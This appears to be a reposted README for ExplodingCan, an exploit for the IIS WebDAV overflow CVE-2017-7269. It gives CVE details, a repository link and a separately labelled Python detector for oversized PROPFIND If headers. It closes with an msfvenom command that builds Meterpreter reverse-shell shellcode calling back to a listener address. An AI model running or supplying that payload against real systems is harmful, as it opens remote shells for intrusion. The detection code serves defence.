Microsoft IIS WebDav 'ScStoragePathFromUrl' Remote Buffer Overflow (CVE-2017-7269)

Posted 0day5


ExplodingCan https://github.com/danigargu/explodingcan  

An implementation of ExplodingCan's exploit extracted from FuzzBunch, the "Metasploit" of the NSA.


Details

  • Vulnerability: Microsoft IIS WebDav 'ScStoragePathFromUrl' Remote Buffer Overflow
  • CVE: CVE-2017-7269
  • Disclosure date: March 31 2017
  • Affected product: Microsoft Windows Server 2003 R2 SP2 x86
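
A defender-side check for this CVE, added here as an example and not part of the original README or the ExplodingCan code. The public CVE description says the overflow is reached through a long header beginning with `If: <http://` in a PROPFIND request, so the code flags that pattern in raw HTTP request text. The function names, the 200-character threshold and both sample requests are assumptions constructed for illustration.

```python
import re

# Assumed threshold: URLs in legitimate WebDAV If headers are short.
# Tune it against your own traffic before alerting on it.
MAX_IF_URL_LEN = 200

# A URL in an If header is wrapped in angle brackets. The closing '>' is
# not required here, so a truncated or malformed header is still measured.
IF_URL = re.compile(r"<(https?://[^>\s]*)", re.IGNORECASE)


def parse_request(raw):
    """Split raw HTTP request text into (method, lower-cased headers dict)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method = lines[0].split(" ", 1)[0].upper()
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            key = name.strip().lower()
            # Join repeated headers so a split If header is seen whole.
            headers[key] = (headers.get(key, "") + " " + value.strip()).strip()
    return method, headers


def flag_cve_2017_7269(raw):
    """Return the reasons a request matches the CVE-2017-7269 pattern."""
    method, headers = parse_request(raw)
    if method != "PROPFIND" or "if" not in headers:
        return []
    return [
        "PROPFIND If header URL of %d characters" % len(url)
        for url in IF_URL.findall(headers["if"])
        if len(url) > MAX_IF_URL_LEN
    ]


# Constructed samples: a normal lock-token check and an oversized If URL.
BENIGN = ("PROPFIND /docs/ HTTP/1.1\r\nHost: files.example.test\r\nDepth: 1\r\n"
          "If: <http://files.example.test/docs/a.txt> (<opaquelocktoken:constructed>)\r\n\r\n")
SUSPECT = ("PROPFIND / HTTP/1.1\r\nHost: files.example.test\r\n"
           "If: <http://files.example.test/" + "A" * 400 + ">\r\n\r\n")

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, flag_cve_2017_7269(req) or "no match")
```

The same length test can run over proxy or WAF logs that record request headers; IIS 6.0 reached end of support with Windows Server 2003, so migrating off the platform or disabling WebDAV on it is the actual mitigation.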

Why?

Months ago I needed to study this exploit, and finally I implemented it in Python.

Shellcode

The shellcode must be in alphanumeric format due to the limitations of the bug. For example, we can use msfvenom (Metasploit) with the alpha_mixed encoder.

$ msfvenom -p windows/meterpreter/reverse_tcp -f raw -v sc -e x86/alpha_mixed LHOST=172.16.20.1 LPORT=4444 >shellcode


